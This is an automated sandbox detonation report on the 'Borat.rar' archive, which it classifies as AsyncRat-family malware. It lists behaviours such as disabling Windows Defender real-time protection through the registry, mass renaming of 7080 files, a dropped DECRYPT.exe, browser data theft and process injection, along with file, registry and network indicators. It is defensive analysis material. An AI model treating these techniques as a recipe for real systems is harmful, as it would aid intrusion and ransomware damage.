Analysis Overview
SHA256
53cdc49c7fb83b419c07edb45c544b106aaa37db00e8a37211678af6350a82f1
Threat Level: Known bad
The file Borat.rar was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Asyncrat family
AsyncRat
Suspicious use of NtCreateUserProcessOtherParentProcess
Renames multiple (7080) files with added filename extension
Reads user/profile data of web browsers
Executes dropped EXE
Enumerates connected drives
Launches sc.exe
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious behavior: GetForegroundWindowSpam
Modifies Internet Explorer settings
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious behavior: RenamesItself
Uses Task Scheduler COM API
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Runs net.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Volume Shadow Copy service COM API
Modifies registry class
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-29 18:40
Signatures
Asyncrat family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral14
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:13
Platform
win11-20240611-en
Max time kernel
1480s
Max time network
1494s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Borat\bin\Netstat.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:33
Platform
win11-20240508-en
Max time kernel
1771s
Max time network
1781s
Command Line
Signatures
Enumerates physical storage devices
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Borat\bin\ip2region.db
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral26
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:33
Platform
win11-20240508-en
Max time kernel
1741s
Max time network
1755s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
Processes
C:\Users\Admin\AppData\Local\Temp\Borat\raw\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Borat\raw\Client.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/3668-1-0x0000000000FE0000-0x0000000000FF4000-memory.dmp
memory/3668-0-0x00007FFE3E073000-0x00007FFE3E075000-memory.dmp
memory/3668-2-0x00007FFE3E070000-0x00007FFE3EB32000-memory.dmp
memory/3668-3-0x00007FFE3E070000-0x00007FFE3EB32000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:11
Platform
win11-20240611-en
Max time kernel
1799s
Max time network
1498s
Command Line
Signatures
AsyncRat
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Borat\BoratRat.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Borat\BoratRat.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Borat\BoratRat.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Borat\BoratRat.exe
"C:\Users\Admin\AppData\Local\Temp\Borat\BoratRat.exe"
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
Network
| Country | Destination | Domain | Proto |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 54.120.234.20.in-addr.arpa | udp |
Files
memory/448-0-0x00007FF9197C3000-0x00007FF9197C5000-memory.dmp
memory/448-1-0x000001D100990000-0x000001D101D9A000-memory.dmp
memory/448-2-0x00007FF9197C0000-0x00007FF91A282000-memory.dmp
memory/448-3-0x00007FF9197C0000-0x00007FF91A282000-memory.dmp
memory/448-4-0x00007FF9197C0000-0x00007FF91A282000-memory.dmp
memory/448-7-0x00007FF9197C0000-0x00007FF91A282000-memory.dmp
memory/448-8-0x00007FF9197C0000-0x00007FF91A282000-memory.dmp
memory/448-9-0x00007FF9197C0000-0x00007FF91A282000-memory.dmp
memory/448-10-0x00007FF9197C0000-0x00007FF91A282000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:28
Platform
win11-20240508-en
Max time kernel
451s
Max time network
1173s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Borat\bin\RemoteCamera.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 18:55
Platform
win11-20240611-en
Max time kernel
830s
Max time network
489s
Command Line
Signatures
AsyncRat
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4804 created 688 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\lsass.exe |
Renames multiple (7080) files with added filename extension
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\DECRYPT.exe | N/A |
Reads user/profile data of web browsers
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\J: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\unregmp2.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\chrmstp.exe | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\System.ServiceModel.Http.dll | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-36.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri-Cambria.xml | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-48_altform-unplated_contrast-black.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\EmptyView.scale-400.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pt-BR\UIAutomationClientSideProviders.resources.dll | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.Todos_0.33.33351.0_x64__8wekyb3d8bbwe\Assets\Wide310x150Logo.scale-200.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsStore_12104.1001.1.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\StoreStoreLogo.scale-100.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\api-ms-win-core-processthreads-l1-1-0.dll | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.32731.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-20_altform-unplated_contrast-white.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\System\msadc\msdaremr.dll | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\EmptyCalendarSearch.scale-125.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Runtime.Numerics.dll | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ru\WindowsFormsIntegration.resources.dll | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\mecontrol.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeComRegisterShellARM64.exe | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\UIAutomationTypes.dll | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft.NET\ADOMD.NET\130\Microsoft.AnalysisServices.AdomdClient.dll | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.GetHelp_10.2008.32311.0_x64__8wekyb3d8bbwe\Assets\GetHelpAppList.targetsize-80.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\Common Files\System\Ole DB\sqloledb.dll | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\Internet Explorer\images\bing.ico | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\access\librist_plugin.dll | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Runtime.InteropServices.RuntimeInformation.dll | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_4.0.2.0_x64__8wekyb3d8bbwe\Assets\Icons\StickyNotesAppList.targetsize-24_altform-lightunplated_contrast-black.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.40831.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\WideTile.scale-100_contrast-white.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.32731.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_21.21030.25003.0_x64__8wekyb3d8bbwe\Lumia.VideoTk.dll | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\cs\Microsoft.VisualBasic.Forms.resources.dll | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_neutral_split.scale-100_8wekyb3d8bbwe\Images\PowerAutomateSquare310x310Logo.scale-100.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\Images\Square44x44Logo.targetsize-60_altform-unplated_contrast-black.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\access\libsmb_plugin.dll | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2020.503.58.0_x64__8wekyb3d8bbwe\Assets\CameraAppList.targetsize-32_altform-unplated.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2020.503.58.0_x64__8wekyb3d8bbwe\Assets\contrast-black\CameraAppList.targetsize-16.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\java.exe | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color120.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\legal\javafx\icu_web.md | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.Paint_10.2104.17.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PaintSmallTile.scale-200.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarLargeTile.scale-200.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.50.24002.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\vlc.mo | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\codec\libddummy_plugin.dll | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\SnipSketchAppList.scale-100.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2020.503.58.0_x64__8wekyb3d8bbwe\Assets\contrast-white\CameraAppList.targetsize-60_altform-unplated.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSplashLogo.scale-100.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-48_altform-lightunplated_contrast-black.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Models.dll | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\LISTS\1033\TIME.XML | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-80_altform-unplated.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-64_altform-lightunplated.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\en\Microsoft.PackageManagement.MetaProvider.PowerShell.resources.dll | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-140.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_x64__8wekyb3d8bbwe\el-GR\PAD.Console.Host.resources.dll | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-36.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\Theme_Photo_AutumnLeaves_Thumbnail.jpg | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-64_contrast-white.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\example_icons2x.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exe | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DBGHELP.DLL | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Shared.v11.1.dll | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_12104.1001.1.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Illustrations\errorIllustration.scale-125.png | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\msinfo32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\system32\msinfo32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\msinfo32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\msinfo32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\msinfo32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\system32\msinfo32.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\msinfo32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMajorRelease | C:\Windows\system32\msinfo32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\msinfo32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\BrowserEmulation | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "2569272612" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "4318" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListDomainAttributeSet = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
